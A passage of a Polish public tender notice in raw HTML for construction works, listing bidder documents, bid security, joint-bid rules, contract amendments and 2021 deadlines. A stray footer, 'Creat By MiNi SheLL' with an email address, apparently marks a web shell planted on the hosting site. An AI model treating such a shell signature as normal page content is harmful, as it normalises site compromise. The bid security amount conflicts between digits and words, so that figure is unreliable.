dowodowych: </h3> Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5<br/>lat,<br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia,<br/>wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na<br/>rzecz których roboty te zostały wykonane, oraz załączeniem dowodów<br/>określających czy te roboty budowlane zostały wykonane należycie, w<br/>szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami<br/>prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego roboty budowlane były wykonywane, a jeżeli<br/>z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w<br/>stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – załącznik nr 6<br/>do SWZ;<br/>2) Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego, a w szczególności odpowiedzialnych za kierowanie robotami<br/>budowlanymi, wraz z informacją na temat ich kwalifikacji zawodowych a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami – załącznik nr 7 do SWZ.<br/>3) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej, sporządzony nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. Pozostałe informacje znajdują się w SWZ dział IX. Informacja o podmiotowych środkach dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga od wykonawców wniesienia wadium w wysokości 3 000,00 zł,słownie: trzydzieści tysięcy złotych. Pozostałe informacje znajdują się w SWZ dział XII. Wymagania dotyczące wadium <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim<br/>przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w Rozdziale IX ust. 1 SWZ, składa każdy z<br/>Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni<br/>wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z<br/>postępowania składa każdy z Wykonawców występujących wspólnie. Pozostałe informacje znajdują się w SWZ dział XI. Informacja dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia<br/>publicznego na warunkach określonych we Wzorze Umowy, stanowiącym Załącznik nr 5 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego<br/>zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści<br/>wybranej oferty w zakresie uregulowanym w art. 454-455 PZP oraz wskazanym we<br/>Wzorze Umowy, stanowiącym Załącznik nr 5 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowaniaformy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-03 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/lasy_starysacz/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-03 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com